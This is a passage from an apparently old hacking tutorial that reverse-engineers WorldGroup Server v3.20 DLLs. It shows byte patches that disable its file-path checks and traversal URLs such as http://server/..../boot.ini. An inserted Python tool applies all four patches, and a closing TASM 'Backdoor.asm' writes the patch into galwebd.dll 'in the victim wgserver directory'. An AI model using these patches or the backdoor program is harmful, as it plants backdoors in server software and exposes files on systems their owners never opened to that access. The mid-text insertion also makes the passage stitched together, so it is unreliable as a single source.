CODE:00402D65   lea     ecx, [ebp+var_104]
CODE:00402D6B   push    ecx
CODE:00402D6C   mov     eax, [ebx+8]
CODE:00402D6F   add     eax, 44h
CODE:00402D72   push    eax
CODE:00402D73   call    j_@istream@read$qpci 
CODE:00402D78   add     esp, 0Ch
CODE:00402D7B   mov     edi, eax
CODE:00402D7D   mov     edx, [edi+8]
CODE:00402D80   mov     edi, edx
CODE:00402D82   cmp     esi, edi
CODE:00402D84   jle     short loc_0_402DDD
CODE:00402D86   movsx   ecx, word ptr [ebx+12h]
CODE:00402D8A   shl     ecx, 5
CODE:00402D8D   mov     eax, [ebx+0Ch]
CODE:00402D90   lea     edx, [eax+ecx]
CODE:00402D93   movsx   ecx, word ptr [ebx+14h]
CODE:00402D97   mov     edi, [edx+ecx*4+8]
CODE:00402D9B   cmp     dword ptr [ebx+24h], 0
Before searching for the call of this subroutine: the conditional jump
jle short loc_0_402DDD is not what we need; maybe we will find a jne jump,
and if we go to offset 402DDD, which may contain a jle jump,
we will see one more check, which does not interest us now.
Now we must find the code that calls our subroutine (402D50).
Here is the other subroutine, which calls ours:
CODE:00402C95 loc_0_402C95:                           ; CODE
CODE:00402C95   cmp     word ptr [ebx+2Ch], 0
CODE:00402C9A   jz      loc_0_402E88
CODE:00402CA0   movsx   edx, word ptr [ebx+12h]
CODE:00402CA4   shl     edx, 5
CODE:00402CA7   mov     ecx, [ebx+0Ch]
CODE:00402CAA   lea     eax, [ecx+edx]
CODE:00402CAD   movsx   edx, word ptr [ebx+14h]
CODE:00402CB1   push    dword ptr [eax+edx*4+8]
CODE:00402CB5   call    j__strlen
CODE:00402CBA   pop     ecx
CODE:00402CBB   mov     esi, eax
CODE:00402CBD   cmp     esi, 100h
Here our subroutine is called after a check of the length of the file request.
100h is 256 in decimal. If we change this jump, the server will report the
256-symbol restriction. So we will not correct this jump, and instead look
somewhat upward in the code, since downward is of no interest.
-->CODE:00402CC3   jl      loc_0_402D50
This part of the code does not interest us, but I brought it for fuller
confidence about how this subroutine works.
CODE:00402CC9   movsx   eax, word ptr [ebx+12h]
CODE:00402CCD   shl     eax, 5                     
CODE:00402CD0   mov     edx, [ebx+0Ch]
CODE:00402CD3   lea     ecx, [edx+eax]
CODE:00402CD6   movsx   eax, word ptr [ebx+14h]
CODE:00402CDA   mov     edi, [ecx+eax*4+8]
CODE:00402CDE   cmp     dword ptr [ebx+24h], 0
CODE:00402CE2   jz      short loc_0_402CEC
CODE:00402CE4   mov     esi, [ebx+24h]
CODE:00402CE7   add     esi, 3Eh
CODE:00402CEA   jmp     short loc_0_402CEF
This is the interesting upper part of the subroutine:
CODE:00402C95 loc_0_402C95:                           ; CODE
CODE:00402C95   cmp     word ptr [ebx+2Ch], 0
CODE:00402C9A   jz      loc_0_402E88
CODE:00402CA0   movsx   edx, word ptr [ebx+12h]
CODE:00402CA4   shl     edx, 5
CODE:00402CA7   mov     ecx, [ebx+0Ch]
CODE:00402CAA   lea     eax, [ecx+edx]
CODE:00402CAD   movsx   edx, word ptr [ebx+14h]
CODE:00402CB1   push    dword ptr [eax+edx*4+8]
CODE:00402CB5   call    j__strlen
CODE:00402CBA   pop     ecx
CODE:00402CBB   mov     esi, eax
CODE:00402CBD   cmp     esi, 100h
Hmm, maybe this conditional jump jz loc_0_402E88 is what we were looking for,
but we can't say that for certain yet.
Let's look at the code it jumps to at address 402E88:
CODE:00402E88 loc_0_402E88:                           ; CODE
CODE:00402E88                 push    ebx
CODE:00402E89                 call    @dnfMap@symDo$qv
CODE:00402E8E                 pop     ecx
CODE:00402E8F                 test    ax, ax
CODE:00402E92                 jz      short loc_0_402E9C
CODE:00402E94                 mov     word ptr [ebx+2Ch], 1
CODE:00402E9A                 jmp     short loc_0_402EE8
Everything looks right: we know for sure that the jump to this piece of
code is not taken for a forbidden URL, and
as a result the message "Symbol missing or out of order: " is output.
And in this piece of code there are no calls to other subroutines which forbid
the connection with the server. It makes sense to change galacth.dll so that
the jump to this piece of code is always taken. This part of the code
can be found at file offset 229A and looks like this:
0000229A: 0F84E8010000    je     000002488
And change it to:
0000229A: E9E9010000                   jmp    000002488
0000229F: 90                           nop
000022A0: 90                           nop
After the change, on the request SERVER/signup/.!/..../wgserver.exe the server
showed this message:
------------------------------------------------------------------------------
"Two sample rows of table are not identical (map steps 1-3): 
0 + 0 != 840972841 , 
in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galuieah.msg, 
Sign-up form"
------------------------------------------------------------------------------
I can't get just any file, but I can get other files like wgsmajor.msg or
zip2exe.exe. Interesting... If we search for this piece of code, the message
has the address:
DATA:0041C627 aTwoSampleRowsO db 'Two sample rows of table are not identical ',0
As always, find the reference to the message; it's at the address:
CODE:00403330 loc_0_403330:                           ; CODE
CODE:00403330   mov     [ebp+var_38], ecx
CODE:00403333   push    0
Here it is:
-->CODE:00403335   push    offset aTwoSampleRows
Below goes a rather long piece of code which I will not describe here,
since it holds nothing essential for our problem.
Let's find the call of the subroutine that outputs such nasty messages (loc_0_403330).
Find the reference to offset 403330 at address 4032F7.
The complete piece of code:
CODE:004032F7 loc_0_4032F7:                           ; CODE
CODE:004032F7   lea     edx, [ebx+edi]
CODE:004032FA   cmp     edx, [ebp+var_18]
CODE:004032FD   jge     loc_0_4033F8
CODE:00403303   mov     ecx, [ebp+var_18]
CODE:00403306   mov     [ebp+var_24], ecx
CODE:00403309   mov     [ebp+var_28], ebx
CODE:0040330C   mov     [ebp+var_2C], edi
CODE:0040330F   movsx   eax, [ebp+var_20]    
CODE:00403313   inc     eax
CODE:00403314   mov     [ebp+var_30], eax
CODE:00403317   movsx   edx, [ebp+var_1E]
CODE:0040331B   inc     edx
CODE:0040331C   mov     [ebp+var_34], edx
CODE:0040331F   cmp     dword ptr [esi+24h], 0
CODE:00403323   jz      short loc_0_40332D
CODE:00403325   mov     ecx, [esi+24h]
CODE:00403328   add     ecx, 3Eh
Jump into our ugliness (loc_0_403330).
->CODE:0040332B   jmp     short loc_0_403330
CODE:0040332D   mov     ecx, [esi+24h]
Since we are dealing with subtraction and addition, the logical thing is to
search for the conditional jump usually used for that.
As I remember it:
JGE - jump if greater or equal (signed comparison)
JA  - jump if above (unsigned comparison)
We have exactly such a conditional jump right at the beginning of this
subroutine's code. This is:
CODE:004032FA   cmp     edx, [ebp+var_18]
->CODE:004032FD   jge     loc_0_4033F8
If our request fails the condition (0-0)!=some_variable(our request), the jump
is not taken. We need to change the conditional jump
jge loc_0_4033F8 to an unconditional jmp loc_0_4033F8,
to teach the server the new arithmetic (0+-0)=[ANY_NUMBER].
Make the necessary changes to the galacth.dll file:
go to offset 28FD, which looks like this:
000028FD: 0F8DF5000000    jge    0000029F8
Change the bytes to make it an unconditional jump:
000028FD: E9F6000000      jmp    0000029F8
00002902: 90              nop
Now save the change and try to get some file, for example:
http://127.0.0.1/signup/....../boot.ini
BOOM!, we did it!
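All four byte patches the text walks through (galwebd.dll at 25DC; galacth.dll at 1AB3, 229A and 28FD) can be applied by one small tool. Added example, not the author's Backdoor.asm and not Galacticomm code: it converts each conditional jump into an unconditional jump to the same target, computing the new displacement instead of copying it; verifies the original bytes before writing, so a different build (where the offsets shift) is refused rather than corrupted; and maps IDA addresses to file offsets with the constant delta the page's own address pairs imply (004024B3/1AB3, 00402C9A/229A, 004032FD/28FD, 00402FDC/25DC). That delta is an assumption taken from those pairs; on a real file confirm it from the PE section table. The DLLs are not included; the fake image is a constructed stand-in with only the expected bytes planted at the patch offsets. One caveat the tool makes visible: a 6-byte jcc rel32 becomes a 5-byte jmp rel32 plus a single NOP, so the second NOP the text writes at 22A0 lands on the first byte of the following instruction and is harmless only because the new jmp never falls through.

```python
import struct

# file offset = IDA virtual address - delta, from the address pairs in the text.
# Assumption: both DLLs load at 0x400000 with the same .text layout; a real
# patcher derives this from the section's VirtualAddress and PointerToRawData.
VA_TO_RAW_DELTA = 0x400A00


def va_to_raw(va):
    return va - VA_TO_RAW_DELTA


def jcc_to_jmp(insn):
    """Turn a conditional jump into an unconditional one to the same target.
    Short form 7x rel8 -> EB rel8 (same displacement, same length).
    Near form 0F 8x rel32 (6 bytes) -> E9 rel32 (5 bytes) + NOP: displacements
    are relative to the end of the instruction, which moved back by one byte,
    so the displacement grows by one."""
    if len(insn) == 2 and 0x70 <= insn[0] <= 0x7F:
        return bytes([0xEB, insn[1]])
    if len(insn) == 6 and insn[0] == 0x0F and 0x80 <= insn[1] <= 0x8F:
        rel = struct.unpack("<i", insn[2:6])[0]
        return b"\xE9" + struct.pack("<i", rel + 1) + b"\x90"
    raise ValueError(f"not a conditional jump: {insn.hex()}")


def nop_out(insn):
    """Replace an instruction by NOPs of the same length (always falls through)."""
    return b"\x90" * len(insn)


# (file offset, bytes that must be there, rewrite rule); the page's four patches.
PATCHES = {
    "galwebd.dll": [(0x25DC, bytes.fromhex("751B"), nop_out)],            # '..' check
    "galacth.dll": [(0x1AB3, bytes.fromhex("7531"), jcc_to_jmp),          # primeDo result
                    (0x229A, bytes.fromhex("0F84E8010000"), jcc_to_jmp),  # "Symbol missing"
                    (0x28FD, bytes.fromhex("0F8DF5000000"), jcc_to_jmp)], # "Two sample rows"
}


def verify_original(image, patches):
    """Offsets whose current bytes differ from what the patch expects.
    An empty list means the image is the build these offsets were taken from."""
    return [off for off, expect, _ in patches
            if bytes(image[off:off + len(expect)]) != expect]


def apply_patches(image, patches):
    """Return a patched copy of `image`; refuse the whole file if any original
    bytes do not match. Rewrites never change instruction length."""
    bad = verify_original(image, patches)
    if bad:
        raise ValueError("original bytes not found at " + ", ".join(f"{o:#x}" for o in bad))
    out = bytearray(image)
    for off, expect, rewrite in patches:
        new = rewrite(expect)
        assert len(new) == len(expect)
        out[off:off + len(new)] = new
    return bytes(out)


def fake_image(patches, size=0x3000):
    """Constructed stand-in for a DLL: zeros with the expected bytes planted at
    the patch offsets. The real files are not part of this example."""
    img = bytearray(size)
    for off, expect, _ in patches:
        img[off:off + len(expect)] = expect
    return bytes(img)


if __name__ == "__main__":
    for name, plist in PATCHES.items():
        patched = apply_patches(fake_image(plist), plist)
        for off, expect, _ in plist:
            print(f"{name} @{off:04X}: {expect.hex()} -> {patched[off:off + len(expect)].hex()}")
    # on a real file: open(name, "wb").write(apply_patches(open(name, "rb").read(), PATCHES[name]))
```

Run against the stand-in it prints exactly the byte pairs the text gives (751B -> 9090, 7531 -> EB31, 0F84E8010000 -> E9E901000090, 0F8DF5000000 -> E9F600000090); the same three functions work for any build once the offsets and original bytes in PATCHES are taken from that build.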
-B- O- N- U- S-#1
OK, time to create a little program which will patch galwebd.dll, giving us a
backdoored galwebd.dll (the 9090 patch at file offset 25DC described above).
With the backdoored DLL we can get any readable file of WGS or the OS.
Backdoor.asm
;################################################################
;############ Backdoor for WorldGroup Server v3.20 ##############
;############ This file patches galwebd.dll        ##############
;############ After the (dll) correction, try urls:##############
;############ For C:\WGSERV                        ##############
;############ http://server/..../boot.ini          ##############
;############ For C:\programm files\gallacticomm\W ##############
;############ orldGroup Server\                    ##############
;############ http://server/../../../../../boot.ini##############
;################################################################
; TASM ideal mode, 16-bit DOS .EXE. Overwrites the two bytes at file
; offset 25DCh (jnz short loc_0_402FF9 = 75 1B) with two NOPs (90 90).
ideal
model small
assume cs:@code, ds:@data, ss:@stack
codeseg
start:
	mov ax,@data
	mov ds,ax
	mov ax,3D01h		;open file, access mode 1 = write only
	mov dx,offset galwebd	;name of file (ASCIIZ)
	int 21h
	jc  fail		;CF set: open failed, ax = DOS error code
	mov [FileNumber],ax
	mov ax,4200h		;lseek from start of file
	mov bx,[FileNumber]
	sub cx,cx		;cx:dx = 0000:25DCh
	mov dx,25DCh		;offset
	int 021h
	mov ah,040h		;write cx bytes from ds:dx
	mov bx,[FileNumber]
	mov cx,002h
	mov dx,offset bytes_00
	int 021h
	mov bx,[FileNumber]
	mov ah,03Eh		;close handle
	int 021h
	mov dx, offset greets
	mov ah,009h		;print greeting
	int 021h
	mov ax,04c00h		;exit, code 0
	int 021h
fail:
	mov dx, offset errmsg
	mov ah,009h
	int 021h
	mov ax,04c01h		;exit, code 1
	int 021h

dataseg
bytes_00 db 90h,90h				;two NOPs replace "jnz short"
galwebd db "galwebd.dll",0
greets  db "[WhU-team] http://www.wghack-team.net",0dh,0ah
	db "You must run this code in the victim wgserver directory!",0dh,0ah
	db "Then, try this url: http://server/..../boot.ini",0dh,0ah,"$"
errmsg  db "Can't open galwebd.dll in the current directory!",0dh,0ah,"$"

FileNumber dw ?
STACK 200h
END start
-----------------------------------------------------------------------------
-B- O- N- U- S-#2